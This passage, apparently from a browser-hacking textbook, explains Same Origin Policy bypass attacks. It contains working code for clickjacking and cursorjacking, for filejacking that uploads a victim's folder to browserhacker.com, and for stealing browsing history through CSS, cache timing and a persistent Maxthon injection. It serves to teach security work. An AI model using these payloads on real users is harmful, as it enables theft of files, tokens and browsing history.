Once you have control over an origin, more sophisticated attacks can be useful. By leveraging the hooked browser to make requests on your behalf, you can effectively proxy requests through the hooked browser and use it to browse other origins. This comes with a number of benefits including browsing with the cookies (authentication tokens) of the hooked user, which allows for a wide range of additional access. Of course, proxying requests can also be very valuable to you even without an SOP bypass.

Anton Rager released the first public research paper on leveraging XSS vulnerabilities to create an HTTP Proxy.25 Petko Petkov then expanded on Rager’s work to create BackFrame. Stefano di Paola and Giorgio Fedon then extended this research further in a paper on “Subverting AJAX”26 in 2006. The two researchers presented various ways to subvert AJAX by leveraging prototype overriding, HTTP Response Splitting and other techniques.

Other research to use a hooked browser to act as an HTTP proxy came from Ferruh Mavituna with the release of XSS Tunnel27 in 2007. This concept was subsequently implemented into BeEF to become the Tunneling Proxy. Since then, BeEF’s Tunneling Proxy has been extended to support exploiting other SOP bypasses. The concept behind the idea of proxying requests through XSS is as follows:

1. A server socket listens on the attacker machine (the proxy back end). It parses incoming HTTP requests, and translates them into AJAX requests, ready to be injected as additional JavaScript code within the hooked browser.

2. These JavaScript snippets are then sent to the hooked browser through one of the communication channels explored in Chapter 3.

3. When the hooked browser executes this additional code, the corresponding AJAX request is issued and the HTTP response is sent back to the proxy back end.

4. The proxy back end strips and adjusts various headers (such as Gzip, content-length and others) and sends the response back to the client socket that originally sent the HTTP request to the proxy.

These four steps have been reproduced in Figure 4-7, which displays how tunneling requests through the hooked browser work.

Figure 4-7: Tunneling Proxy high-level architecture

image

When tunneling requests, by default you are limited to the same-origin as the hooked site due to the SOP. For instance, if you hooked a user at browservictim.com you would only be able to request additional pages within that origin. This is because the SOP is preventing you from going outside of that origin.

With an SOP bypass, however, you would be able to proxy requests outside of that origin. This would allow you to request arbitrary pages with the authorization (cookie session tokens) of the hooked browser.

Consider a scenario (without an SOP bypass) where you want to target a public-facing web application. A Web Application Firewall (WAF) may be present, configured to aggressively block the attacking source IP after a threshold of five malicious requests. You just found a DOM-based XSS, which can’t be mitigated by a classic WAF, and you are able to hook an internal network user of the same company. More than likely, the WAF has the company gateway address and network range white-listed on its rule sets, because the perceived probability of an attack coming from the internal network is minimal.

You can now use the Tunneling Proxy to check for more bugs on the web application. The requests are tunneled through the hooked browser sitting in the internal network, so they shouldn’t generate too much noise on the WAF. Ideally, they will be completely ignored by the WAF because they come from the internal network. As explored in the “Proxying through the Browser” section of Chapter 9, you can even use Burp and sqlmap through the Tunneling Proxy.

Another reason you may want to use the Tunneling Proxy within the same-origin is if the origin surface requires authentication. Imagine you have an XSS post-authentication, and you’re able to hook a browser with that vulnerability. Using the Tunneling Proxy, you can now easily browse the authenticated surface of the application, effectively riding the hooked target’s session. You don’t even need to steal cookies. Importantly, the HttpOnly security control is not effective in this case, because it’s the target’s browser itself that is requesting resources for you.

If instead you use the Tunneling Proxy combined with an SOP bypass, you effectively have an open HTTP proxy in your hands. This is because the vulnerable hooked browser can send cross-origin requests and read responses from every origin. In fact, if you have multiple hooked browsers, all affected by the same SOP bypass, you will have multiple proxies. You can switch between proxies depending on the hooked browser network bandwidth, or target the same-origin from multiple hooked browsers to deliver the attack from multiple locations.

Exploiting UI Redressing Attacks

UI redressing attacks have become prominent in browser and application security scenarios. Due to the growth of social networks, the viral and omnipresent advertisements and “Like” buttons, this type of attack has started to be exploited in the wild.28

The most well-known type of UI redressing attack is Clickjacking. Obviously, there are various other attacks that can be classified as UI redressing. They differ based on the kind of action you can take and the information you can retrieve. Some of these are analyzed in the next sections, together with a few historic attacks that relied on drag&drop actions.

Using Clickjacking

Clickjacking attacks rely on using independently positioned transparent IFrames and special CSS selectors to fool the user into clicking on an invisible element. This attack was first discussed in 2002 by Jesse Ruderman29 and was then later named Clickjacking by Robert Hansen and Jeremiah Grossman in 2008. Consider the following example, where a page that contains administrative functionality is embedded in another page through an IFrame:

<html>

<head>

</head>

<body>

<form name="addUserToAdmins" action="javascript:

alert('clicked on hidden IFrame. User added.')" method="POST">

<input type="hidden" name="userId" value"1234">

<input type="hidden" name="isAdmin" value"true">

<input type="hidden" name="token" value"asasdasd86a

sd876as87623234aksjdhjkashd">

<input type="submit" value="Add to admin group"

style="height: 60px; width: 150px; font-size:3em">

</form>

</body>

</html>

You can see the page also uses anti-XSRF tokens to prevent Cross-site Request Forgery attacks. For the sake of the demonstration, the action attribute of the HTML form contains JavaScript that displays an Alert box. A real page would contain a proper URL where those input values are sent. When the user clicks the Submit button, the user with ID 1234 is added to the administrative group. To launch the attack, the previous page is framed in the following page:

<html>

<head>

<style>

iframe{

filter:alpha(opacity=0);

opacity:0;

position:absolute;

top: 250px;

left: 40px;

height: 300px;

width: 250px;

}

img{

position:absolute;

top: 0px;

left: 0px;

height: 300px;

width: 250px;

}

</style>

</head>

<body>

<!-- The user sees the following image-->

<img src="http://localhost/clickjacking/yes-no_mod.jpg">

<!-- but he effectively clicks on the following framed content -->

<iframe src="http://localhost/clickjacking

/iframe_content.html"></iframe>

</body>

</html>

The result is shown in Figure 4-8. Note that it looks like there is no visible presence of the framed content. This undetectable content is actually the basis of many UI redressing attacks as it is actually what your target interacts with.

Figure 4-8: An apparently innocuous poll page with two buttons

image

If you comment out the first two lines of the IFrame CSS definition in the previous code snippet, the opacity will be removed and you can see how the IFrame is positioned, as shown in Figure 4-9. The top and left CSS attributes are used to place the IFrame on top of the image buttons.

Figure 4-9: Removing the IFrame opacity reveals the real positioning.

image

When the user clicks either YES or NO, what is really clicked will be the HTML form submit button loaded in the IFrame, as you can see in Figure 4-10.

Figure 4-10: Clicking on the hidden IFrame submit button

image

This is a very simple example of how a user can be fooled into performing unwanted actions. The concept behind this attack could be used for a number of purposes, for example elevating the privileges of a normal user. The victim of such an attack could be a user that has administrator privileges. They could be already logged in to an application with functionality similar to the code snippet presented earlier.

The fact the application relies on an anti-XSRF token doesn’t impact the delivery of the Clickjacking attack. This is because the resource to be framed is loaded normally and contains a valid anti-XSRF token. Clickjacking is in fact an ideal attack method you can perform against an application that uses anti-XSRF tokens, effectively nullifying the protection offered by those tokens.

Chapter 3 discusses how to prevent loading resources in IFrames. The same caveats presented in that chapter can be applied here. A way to generally prevent UI redressing attacks (as almost every attack relies on loading a resource into an IFrame) is by using the header X-Frame-Options: DENY. As you will learn in the next sections, there have been cases where simple frame-busting code was not enough to prevent some attacks.

Clickjacking the Flash Settings Manager

Robert Hansen and Jeremiah Grossman contributed greatly to the public awareness of Clickjacking attacks. In 2008, they were able to mount a Clickjacking attack on the Flash Settings Manager.30

Using transparent (opaque=0) IFrames and divs, they successfully hid the Flash Settings Manager “Allow” button over those elements. The target, while apparently clicking an innocuous button, would actually be clicking on the Flash Settings widget as shown in Figure 4-11.

Figure 4-11: The opaque IFrames and divs cover the Flash widget text.

image

The impact of such an action is clearly visible here, resulting in the compromise of the target’s privacy. Note that the text displayed in the Flash Settings Manager isn’t visible either, leaving the target completely unaware of what is happening and where they are clicking.

The previous Clickjacking examples have demonstrated what is possible with CSS alone. If you need the attack to take dynamic information from the target, for instance mouse movements, you can throw JavaScript into the mix. The flexibility of JavaScript enables you to determine the exact xand y coordinates of the current mouse position. This comes in handy when mounting complex Clickjacking attacks that rely on multiple clicks to be performed.

Imagine you framed a page with a button that required a user click in order to execute your attack. In this instance, your Clickjacking aim is to ensure your target’s mouse is always on top of that button. In this way, as soon as they click anywhere, the user is effectively clicking exactly where you want. Rich Lundeen and Brendan Coles created a BeEF command module implementing this very technique.31

In this scenario you have two frames, an inner and an outer IFrame. The outer IFrame loads the target origin you want to exploit with the Clickjacking attack. The inner IFrame instead listens to onmousemove events, and its position gets updated according to the current mouse cursor position. In this way, the mouse cursor is always over what you want the target to click on.

The following code uses the jQuery API to dynamically update the position of outerObj given the current mouse coordinates:

$j("body").mousemove(function(e) {

$j(outerObj).css('top', e.pageY);

$j(outerObj).css('left', e.pageX);

});

The inner IFrame style uses the opacity trick to render an invisible element:

filter:alpha(opacity=0);

opacity:0;

Consider the following sample page, which is the target of the Clickjacking attack. You want the user to click the Add User button, which in this case simply creates a pop-up when the user clicks it. Note the bodybackground that has been added to better illustrate the following example:

<html>

<head>

</head>

<body style="background-color:red">

<p> </p>

<button onclick="javascript:alert('User Added')" \

type="button">Add User to Admin group</button>

<p> </p>

</body>

</html>

If you launch the “Clickjacking” BeEF module with the preceding HTML as the inner IFrame, then all the clicks will be sent to the IFrame. The results of this can be seen in Figure 4-12 and Figure 4-13. As you can see, the IFrame is following the mouse movements, so that wherever the user clicks on the page, they will actually be clicking the Add User button.

Figure 4-12: The IFrame is reliably following the mouse movements.

image

Figure 4-13: The cursor is still on top of the button.

image

When the user decides to click somewhere, the click will trigger the onClick event of the button in the framed page. As you have seen in the source of the framed page, this will result in an Alert dialog, as shown in Figure 4-14.

Figure 4-14: Successful Clickjacking

image

Note that in the previous figures, you can see the background and the button under the mouse cursor. This is because, for the sake of the demonstration, the opacity has not been set to hide the IFrame’s content.

Using Cursorjacking

This section will explore similar attacks to Clickjacking, however this time the attack is focused on the mouse cursor. Cursorjacking comes in handy if you need to mount complex UI redressing attacks.

NoScript ClearClick

NoScript is one of the more popular Firefox extensions designed to help prevent XSS, XSRF, and various UI redressing attacks. Its ClearClick32 functionality helps with identifying and preventing Clickjacking attacks by taking a screenshot of the framed page and the parent page, as you would normally see it. If the two screenshots are different, then a Clickjacking attack is identified. Using this technique, NoScript is able to identify clicks on page elements that are transparent and which are potentially being used to deliver Clickjacking attacks.

The first examples of Cursorjacking were demonstrated by Eddy Bordi, and then refined by Marcus Niemietz.33 Cursorjacking deceives users by means of a custom cursor image, where the pointer is displayed with an offset. The displayed cursor is shifted to the right from the actual mouse position. An attacker can then direct user clicks to desired and well-positioned elements. Consider the following page:

<html>

<head>

<style type="text/css">

#c {

cursor:url("http://localhost/basic_cursorjacking

/new_cursor.png"),default;

}

#c input{

cursor:url("http://localhost/basic_cursorjacking

/new_cursor.png"),default;

}

</style>

</head>

<body>

<h1> CursorJacking. Click on the 'Second' or 'Fourth' buttons. </h1>

<div id="c">

<input type="button" value="First" onclick="alert('clicked on 1')">

<input type="button" value="Second" onclick="alert('clicked on 2')">

<br></br>

<input type="button" value="Third" onclick="alert('clicked on 3')">

<input type="button" value="Fourth" onclick="alert('clicked on 4')">

</div>

</body>

</html>

From the CSS definition, you can see the mouse cursor is changed with a custom image. The image, as you can see in Figure 4-15, contains a mouse icon that is moved to a static offset on the right.

Figure 4-15: Clicking the Second button results in clicking the First button.

image

For demonstrative purposes, the image background is visible. In a real attack, the image would still be a PNG but with a transparent background. When the target tries to click the Second or Fourth buttons in the page, they will actually be clicking the buttons on the left of the page. The real positioning of the mouse cursor is hidden using the new cursor image.

Krzysztof Kotowicz34 and Mario Heiderich extended these Cursorjacking techniques. Their new attack vector relied on completely hiding the cursor in the body of the page and adding the following style to the body element:

<body style="cursor:none">

A different cursor image is then dynamically overlaid and is associated with mousemove events. The following code demonstrates this technique:

<html>

<head><title>Advanced cursorjacking by Kotowicz & Heiderich</title>

<style>

body,html {margin:0;padding:0}

</style>

</head>

<body style="cursor:none;height: 1000px;">

<img style="position: absolute;z-index:1000;" id=cursor

src="cursor.png" />

<div style=margin-left:300px;">

<h1>Is this a good example of cursorjacking?</h1>

</div>

<button style="font-size:

150%;position:absolute;top:130px;left:630px;">YES</button>

<button style="font-size: 150%;position:absolute;top:130px;

left:680px;">NO</button>

<div style="opacity:1;position:absolute;top:130px;left:30px;">

<a href="https://twitter.com/share" class="twitter-share-button"

data-via="kkotowicz" data-size="small">Tweet</a>

<script>!function(d,s,id){var

js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id))

{js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/

widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,

"script","twitter-wjs");</script>

</div>

<script>

function shake(n) {

if (parent.moveBy) {

for (i = 10; i > 0; i--) {

for (j = n; j > 0; j--) {

parent.moveBy(0,i);

parent.moveBy(i,0);

parent.moveBy(0,-i);

parent.moveBy(-i,0);

}

}

}

}

shake(5);

var oNode = document.getElementById('cursor');

var onmove = function (e) {

var nMoveX = e.clientX, nMoveY = e.clientY;

oNode.style.left = (nMoveX + 600)+"px";

oNode.style.top = nMoveY + "px";

};

document.body.addEventListener('mousemove', onmove, true);

</script>

</body>

First, the mouse cursor image is replaced with a custom image. Second, a new event listener is then attached to the page body, listening for mousemove events. When the real mouse is moved, the events trigger the listener that results in the fake mouse cursor (the visible one) moving accordingly.

With JavaScript, the real cursor movements are followed (on both x and y coordinates), and the position of the fake cursor is updated. As you may realize, the same technique was used in the previous section on advanced Clickjacking. The results can be seen in Figure 4-16, when the target clicks the YES button, they’re actually clicking on the Twitter button.

Figure 4-16: Clicking the YES button results in clicking the Twitter button.

image

This new Cursorjacking technique originally bypassed NoScript’s ClearClick protection. Remember what was discussed earlier about the protection offered by ClearClick, which is its ability to be able to identify if a click is done on a transparent (opaque=0) element? Well, in the previous example, the real click is done in a non-opaque region of the page (the Twitter button), so NoScript couldn’t detect the attack. This ClearClick bypass has been addressed in NoScript version 2.2.8 RC1.35

Using Filejacking

Filejacking allows the extrusion of directory contents from the target’s underlying OS to the attacker’s server through clever UI manipulation within the browser. The result is that under certain conditions, you can download files from the target’s machine. The two prerequisites to successfully perform this attack are:

1. The target must use Chrome, because it’s currently the only browser that supports directory and webkitdirectory input attributes like the following:

<input type="file" id="file_x " webkitdirectory directory />

2. The attack relies on baiting the target into clicking somewhere, similar to other UI redressing techniques. In this case, the input element presented is hidden behind a button element, with the common opacity CSS trick you’ve seen in the previous pages.

Kotowicz36 first published this UI redressing research in 2011 after analyzing the impact of delivering Filejacking attacks to users baited with social engineering tricks.

The Filejacking attack relies on the target using the operating system’s “Choose Folder” dialog box when downloading a file from the web. To optimize the attack, you should attempt to trick the user into selecting a directory containing sensitive files, for instance by employing authentic-looking phishing content. Figure 4-17 demonstrates what the target will see if they select the “Download to…” button. JavaScript will enumerate the files in the directory with the directory input attribute, and then POST each of the files back to your server.

Figure 4-17: Clicking “Download to…” opens the Choose Folder dialog.

image

Consider the following server-side Ruby code:

require 'rubygems'

require 'thin'

require 'rack'

require 'sinatra'

class UploadManager < Sinatra::Base

post "/" do

puts "receiving post data"

params.each do |key,value|

puts "#{key}->#{value}"

end

end

end

@routes = {

"/upload" => UploadManager.new

}

@rack_app = Rack::URLMap.new(@routes)

@thin = Thin::Server.new("browserhacker.com", 4000, @rack_app)

Thin::Logging.silent = true

Thin::Logging.debug = false

puts "[#{Time.now}] Thin ready"

@thin.start

The code is binding Thin, a Ruby web server, on port 4000 ready to process HTTP POST requests to the /upload URI. When a POST request arrives to that URI, the contents are printed on the console, as you can see in Figure 4-18.

The following JavaScript code is the client-side part of the attack. Note the cloak button and the cloaked input elements have their opacity set to 0. These will then be covered by the visible button element. When the target clicks the button, they are actually clicking the input element, thinking they need to select a download destination, as you have seen in Figure 4-17.

As soon as the target clicks the input element, a download destination is chosen. The onchange event on the input element is then triggered and the relating anonymous function is executed. This results in enumerating the files contained in the selected download destination and formatting the content using the FormData object. Finally, they are extruded with a cross-origin POSTXMLHttpRequest. That is, the contents of the chosen directory are enumerated and every file is uploaded to your server:

<html>

<head>

<script src="http://ajax.googleapis.com/ajax/libs

/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>

<style>

body {background: #333; color: #eee;}

a:link, a:visited {color: lightgreen;}

input[type='file'] {

opacity: 0;

position: absolute;

left: 0; top: 0;

width: 300px;

line-height: 20px;

height: 25px;

}

#cloak {

position: absolute;

left: 0;

top: 0;

line-height: 20px;

height: 25px;

cursor: pointer;

}

label {

display: block;

}

</style>

</head>

<body>

<button id=cloak>Download to...</button>

<input type="file" id="cloaked" webkitdirectory directory />

<script>

document.getElementById("cloaked").onchange = function(e) {

for (var i = 0, f; f = e.target.files[i]; ++i) {

console.log("sending file with path: " +

f.webkitRelativePath + ", name: " + f.name);

fdata = new FormData();

fdata.append('path', f.webkitRelativePath);

fdata.append('name', f.name);

fdata.append('content', f);

var xhr = new XMLHttpRequest();

xhr.open("POST", "http://browserhacker.com/upload", true);

xhr.send(fdata);

}

};

</script>

</body>

</html>

Note that the origins of the two previous snippets are different, but this doesn’t prevent the attack from working. The files can be extruded from the target’s operating system, respecting the SOP, on Gecko and WebKit powered browsers such as Firefox, Chrome and Safari. In cross-origin scenarios, these browsers still send the XMLHttpRequest even though the response cannot be read, whereas other browsers such as Opera do not. You will explore how this behavior is significant with many types of new attacks in Chapters 9 and 10.

Figure 4-18: The POST data is sent cross-origin.

image

Using Drag and Drop

Another example of how inconsistent SOP implementations can result in vulnerabilities is the drag&drop UI redressing attack. Exploiting these holes in the target browser will result in stealing content across different origins. One of the first public disclosures of such an attack was from Michal Zalewski in late 2010.37 He reported a bug in Firefox (patched in 2012) where the SOP was not enforced when performing cross-origin drag&drop actions.

You could create an IFrame in a phishing page you control. The IFrame source points to a cross-origin resource, whose content can be read by bypassing the SOP if the user drags the IFrame and drops it somewhere in the top-level window.

This behavior can be achieved by tricking the target—for example, by displaying a basic game—to drag&drop elements in the page. The element that is dragged and dropped is the IFrame with the content you want to read.

The first PoC applying this technique used resources framed with view-source://. For example:

<iframe src="view-source:http://browservictim.com/any">

If a resource is loaded with view-source, the raw HTML source is rendered. There are numerous advantages to tricking the user into performing a drag&drop action of this framed content into the top-level window. These include the ability to read anti-XSRF tokens and any other information you can get reading the raw HTML of the page.

This bug was patched in late 2011 in Firefox, disallowing cross-origin drag&drop actions. Kotowicz found another interesting way around this limitation, which still worked in Firefox at the time of this writing. The technique is called “Fake Captcha”38 and covers a specific corner case. This issue occurs where a resource is framed using view-source as discussed before, and the content you want to retrieve is positioned with a specific offset on the top-level window. The technique is exploiting the fact that the user, when presented with an input field containing some content to be copied, may rely on a mouse triple-click and Ctrl+C. This action selects and copies the whole content to the clipboard. In this case, the content displayed in the input field is a fragment of a line of raw HTML from the framed content. Figure 4-19 shows what the user sees, and Figure 4-20 illustrates what’s really happening in the background.

Figure 4-19: Source visible to the user.

image

If the user triple-clicks with the mouse on the Security Code input field, it will effectively copy the whole line, as you can see in Figure 4-20. The highlighted content is only a piece of the line, the section you want the unsuspecting user to see. The technique relies on positioning the IFrame at a specific offset on the top-level window. The Security Code input field is not a real input field, but an IFrame, as you can see from the following code:

<style>

iframe#one {

margin: 0;

padding: 0;

width: 9em;

height: 1em;

border: 2px inset black;

font: normal 13px/14px monospace;

display: inline-block;

}

</style>

<p>

<label>Security code:</label><iframe id=one scrolling=no

src="http://browservictim.com/any"></iframe>

</p>

Figure 4-20: Enlarging the IFrame shows more detail

image

When the target pastes the content to the second input field, the whole line content is effectively pasted, and the full line content is revealed to you. In this example (as you can see in Figure 4-21) an anti-XSRF token is retrieved, and can be used for future attacks to the framed origin.

Figure 4-21: The whole line pasted by the user is an anti-XSRF token.

image

This technique allows cross-origin content extraction, effectively bypassing the SOP. It is also worthwhile noting that in October 2011 this technique was exploited in the wild against Facebook.39

Another cross-origin content extraction method is the IFrame-to-IFrame drag&drop technique by Luca De Fulgentis.40 The technique is very similar to the previous drag&drop/view-source PoC. The main difference is that the target will drag&drop the target IFrame on another IFrame, not in the top-level window.

In this attack, you control the drag&drop destination IFrame. When content is dropped into your IFrame, Firefox submits the information back to you, even cross-origin. This occurs because no checks on cross-origin drag&drop actions between IFrames were implemented in the codebase. In his original disclosure, De Fulgentis demonstrated how to target LinkedIn users by stealing anti-XSRF tokens, and then subsequently adding arbitrary e-mail addresses to a target’s profile.

De Fulgentis’ technique serves as another clear example of a lack of SOP enforcement on drag&drop actions.

Exploiting Browser History

Browser history attacks reveal information about other origins. They give you a way of determining what origins the browser (and of course, the user) has been visiting.

In the past, an effective form of browser history attack involved simply checking the color of links written to the page. You will briefly explore using CSS Colors, however keep in mind modern browsers have now been patched for this form of attack.

You will also check out attacks involving timing. These attack methods are currently the most effective for revealing browser history information across a range of browsers.

Other corner cases exist that rely on specific APIs being exposed by the browser itself. A few examples of lesser-known browsers vulnerable to these history-stealing vulnerabilities, such as Avant and Maxthon browsers will also be explored.

Using CSS Colors

In the ‘good old days’, it was possible to steal browser history using CSS information. This was primarily performed through the abuse of the visited CSS selector. The following technique (discussed on Full Disclosure41 in 2002) was very simple but very effective. Consider the following link:

<a id="site_1" href="http://browservictim.com">link</a>

A CSS action selector could be used to check if the target visited the previous link, and therefore be present in the browser history:

#site_1:visited {

background: url(/browserhacker.com?site=browservictim);

}

In this case, the background selector is used, but you can use any selector where a URI can be specified. In the instance of browservictim.com being present in the browser’s history, a GET request to browserhacker.com?site=browservictim would be submitted.

Jeremiah Grossman disclosed a similar technique in 2006 that relied on checking the color of a link element. In most browsers, the default behavior when a link had already been visited was to set the color of the link text to violet. On the other hand, if the link had not been visited, it was set to blue. In Grossman’s original Proof of Concept,42 the visited style was overridden with a custom style (for example, a red color). A script was then used to dynamically generate links on the page, potentially hidden from the user. These were then finally compared with the previously overridden red style. If they matched, you would know that the site was present in the browser history. Consider the following example:

<html>

<head>

<style>

#link:visited {color: #Fc00f000;}

</style>

</head>

<body>

<a id="link" href="http://browserhacker.com"

target="_blank">clickme</a>

<script>

var link = document.getElementById("link");

var color = document.defaultView.getComputedStyle(link,

null).getPropertyValue("color");

console.log(color);

</script>

</body>

</html>

If the link was previously visited, and the browser is vulnerable to this attack, the output in the console log would be rgb(255, 0, 0), which corresponds to the red color overridden in the CSS. If you run this snippet in the latest Firefox (which is patched against this attack) it will always returnrgb(0, 0, 238).

Nowadays, most modern browsers have patched this behavior. For example, Firefox patched this technique in 2010.43

Using Cache Timing

Felten and Schneider44 produced one of the first public research papers on the topic of cache timing attacks in 2000. The paper, titled “Timing Attacks on Web Privacy,” was mainly focused on measuring the time required to access a resource with or without browser caching. Using this information, it was possible to deduce if the resource was already retrieved (and cached). One of the limits of this approach was that querying the browser cache during the initial test was also tainting it.

Michal Zalewski explored45 another non-destructive technique to extract browser history using a similar cache-timing technique. At the time of this writing, this technique works on modern browsers.

Zalewski’s approach consists of loading resources in IFrames, trapping SOP violations and preventing the alteration of the cache. For this purpose, IFrames are great, because the SOP is enforced and you can prevent the IFrame from fully loading the resource, preventing the modification of the local cache. The cache stays unaltered thanks to the short timings used when loading and unloading resources. As soon as it can be ascertained that there is a cache miss on a particular resource, the IFrame load is stopped. Such behavior allows testing the same resource again at a later stage.

The most effective resources to target using this technique are CSS or JavaScript files, because they are often cached by the browser, and are always loaded when browsing to a target website. One issue to be mindful of is that these resources will be loaded in IFrames, and as such, should not include any Framebusting logic, such as X-Frame-Options (other than Allow).

The output of this attack is demonstrated in Figure 4-22. In this instance it was determined that the user had browsed to AboveTopSecret.com and Wikileaks.org.

Figure 4-22: Browser history retrieval using cache timing

image

The two resources that are typically loaded when browsing to those websites are:

http://wikileaks.org/squelettes/random.js

http://www.abovetopsecret.com/forum/ats-scripts.js

The core of the technique is the following code snippet:

function wait_for_noread() {

try {

/*

* This is where the SOP violation is happening,

* because we're trying to read the location.href

* property of a cross-origin resource loaded into

* an IFrame.

*/

if (frames['f'].location.href == undefined) throw 1;

/*

* Until TIME_LIMIT is not reached, continuously try to

* read location.href from the IFrame. Otherwise call

* maybe_test_next() that resets the IFrame src to

* about:blank preventing the full resource loading

* and cache alteration.

* Then proceed with the next resource.

*/

if (cycles++ >= TIME_LIMIT) {

maybe_test_next();

return;

}

setTimeout(wait_for_noread, 1);

} catch (e) {

/*

* The SOP violation is trapped, confirming

* that the checked resource is cached.

*/

confirmed_visited = true;

maybe_test_next();

}

}

When an SOP violation is trapped before a specific time-out, it means the cache is being hit. This confirms that the resource is cached, and from this you can infer the user has visited the website where the resource was loaded from. Figure 4-23 demonstrates this behavior.

Figure 4-23: SOP violation errors

image

You can read the full source code of this technique on the https://browserhacker.com website, or the Wiley website at: www.wiley.com/go/browserhackershandbook where the original three PoCs have been modified and merged as a single code snippet.

Inspired by Zalewski’s research, Mansour Behabadi46 discovered another technique that relied on the loading of images instead. The technique currently only works on WebKit- and Gecko-based browsers. When your browser has previously cached an image, it usually takes less than 10 milliseconds to load it from the cache. However, when the image is not present in the browser’s cache, the retrieval from the Internet is subject to network latency and image size. Using this timing information, you can infer whether a target’s browser has previously visited websites. The following is an example of how this technique works:

//check if twitter was visited

var url = "https://twitter.com/images/spinner.gif";

var loaded = false;

var img = new Image();

var start = new Date().getTime();

img.src = url;

var now = new Date().getTime();

if (img.complete) {

delete img;

console.log("visited");

} else if (now - start > 10) {

delete img;

window.stop();

console.log("not visited");

}else{

console.log("not visited");

}

If you open this code snippet in Firefox or Chrome, and you had previously visited Twitter, you should see “visited” printed in the browser console (Firebug or Developer Tools). Alternatively, if the image takes longer than 10 milliseconds to load because it’s not cached and is being retrieved from the Twitter website, you should see “not visited.”

Keep in mind that an additional limitation of this technique is that the resource you want to check, for example http://twitter.com/images/spinner.gif, might be changed by the time you read this book. This is already the case for some of the resources used in the original PoC by Zalewski.

Because both of these techniques rely on specific, and short, timings when reading from the cache, they’re both very sensitive to machine performance. This is particularly the case with the second technique, where the timing is “hard-coded” to 10ms. For example, if you’re playing an HD video on YouTube while your machine is extensively using CPU and IO, the accuracy of the results may decrease.

Using Browser APIs

Avant is a lesser-known browser that can swap between the Trident, Gecko and WebKit rendering engines. Roberto Suggi Liverani discovered an attack for bypassing the SOP using specific browser API calls in the Avant browser prior to 2012 (build 28). Let’s consider the following code that shows this issue:

var av_if = document.createElement("iframe");

av_if.setAttribute('src', "browser:home");

av_if.setAttribute('name','av_if');

av_if.setAttribute('width','0');

av_if.setAttribute('heigth','0');

av_if.setAttribute('scrolling','no');

document.body.appendChild(av_if);

var vstr = {value: ""};

//This works if Firefox is the rendering engine

window['av_if'].navigator.AFRunCommand(60003, vstr);

alert(vstr.value);

This code snippet loads the privileged browser:home address into an IFrame, and then executes the AFRunCommand() function from its navigator object. This function is an undocumented and proprietary API that Avant added to the DOM. During his research, Liverani brute-forced some of the integer values to be passed as the first parameter to the function. He found that by passing the value 60003 and a JSON object to the AFRunCommand() function, he was able to retrieve the full browser history.

This is clearly an SOP bypass because code running on an origin like http://browserhacker.com should not be able to read the contents of a privileged zone, such as browser:home, as occurred in this case. Executing the previous code snippet would result in a pop-up containing the browser history, as shown in Figure 4-24.

Figure 4-24: Calling the proprietary AFRunCommand function

image

A similar vulnerability has been found in Maxthon 3.4.5 build 2000. Maxthon is another web browser and, similar to Avant, Maxthon exposes non-standard APIs to access files and even launch executables.

Roberto Suggi Liverani found47 that the content rendered in the about:history page does not have effective output escaping. This leads to exploitable conditions. If you trick a target into opening a link like the following, malicious injection will persist in the history page:

http://172.16.37.1/malicious.html#" onload='alert(1)'<!—

The code contained in the onload attribute will execute every time the target checks the browser history. The interesting thing here is that the malicious JavaScript code is executed in a privileged context. The about:history page happens to be mapped to a custom Maxthon resource atmx://res/history/index.htm. Injecting code into this context allows you to steal all the history content. For example, the following code parses all the links in the history-list div:

links = document.getElementById('history-list')

.getElementsByTagName('a');

result = "";

for(var i=0; i<links.length; i++) {

if(links[i].target == "_blank"){

result += links[i].href+"\n";

}

}

alert(result);

This payload could be packaged and delivered with the following link:

http://172.16.37.1/malicious.html#" onload='links=document.

getElementById("history-list").getElementsByTagName("a");

result="";for(i=0;i<links.length;i++){if(links[i].target=="_blank")

{result+=links[i].href+"\n";}}alert(result);'<!--

It is important to note that this Cross-content Scripting (explored further in Chapter 7) vulnerability is persistent. After loading the malicious content into the history page the first time, the code will execute every time the user revisits their history. When the user opens the browser history page, the result will be something similar to Figure 4-25.

Figure 4-25: The malicious code injected as a link is executed.

image

Naturally, to launch a real attack it would be necessary to replace the alert() function with one of the hooking techniques discussed in Chapter 3. This way, the stolen browser history can be sent back to a collection server.

These examples highlight a much bigger issue. Clearly, security researchers need to continue looking for weaknesses in software, in particular browsers. While these flaws were discovered against Avant and Maxthon, the attack surface of browsers will continuously evolve over time.

Even though it’s common for custom browsers to leverage technology such as WebKit and Gecko, it’s also fairly common for new APIs to be made available too. So get your fuzzing engines started!

Summary

This chapter has explored the SOP in greater detail as well as the importance of trying to bypass it when browser hacking. Bypassing the SOP allows hooked browsers to potentially become open proxies. Not only that, but the ability to read HTTP responses from different origins will increase the effectiveness of the attacks you will discover in the following chapters.

To reliably bypass the SOP, it’s important to understand the SOP in all its various incarnations. In its simplest form, the SOP considers resources having the same hostname, scheme and port as residing at the same-origin. If any of these attributes varies, the resource is in a different origin. Only resources from the same-origin are free to interact without restriction. Unfortunately, the SOP differs between various contexts and browsers. How the SOP behaves in the DOM compared to how it behaves in plugins is also often inconsistent.

With a grasp of how the SOP functions, you’re then confronted with a number of different ways to bypass the SOP, depending on the context of your attack. This chapter has provided multiple means to bypass the SOP, covering avenues of attack in Java, Adobe Reader, Adobe Flash, Silverlight, Internet Explorer, Safari, Firefox, Opera and even in cloud storage providers.

Once you’ve established the context of your bypass, you then have a number of benefits up your sleeve. From proxying requests through the target’s browser, to exploiting UI redressing attacks or even unveiling the user’s browser history, an SOP bypass will often prove invaluable in your browser hacking activities.

For browser developers, achieving a consistent and, most importantly, enforced SOP implementation across browser types, versions and plugins is a big challenge. The evolving number of new HTML5 features added to each major browser release exacerbates the challenge. This is part of the reason why SOP bypasses will continue to be so important in the future, both in terms of attack and defense.

Questions

1. What is the Same Origin Policy and why it is so important when dealing with browser security?

2. Why would achieving an SOP bypass be very interesting from the attacker’s point of view?

3. Explain how you can use the hooked browser as an HTTP proxy. What is the difference between using it with an SOP bypass and without?

4. Describe one of the Java SOP bypasses.

5. Explain how the Safari SOP bypass works.

6. Explain how the latest Adobe Reader SOP bypass is related to XML External Entity vulnerabilities.

7. Describe an example of Clickjacking.

8. Describe an example of Filejacking.

9. How have browser history hacks historically evolved? Describe one of the latest attacks based on cache timing.

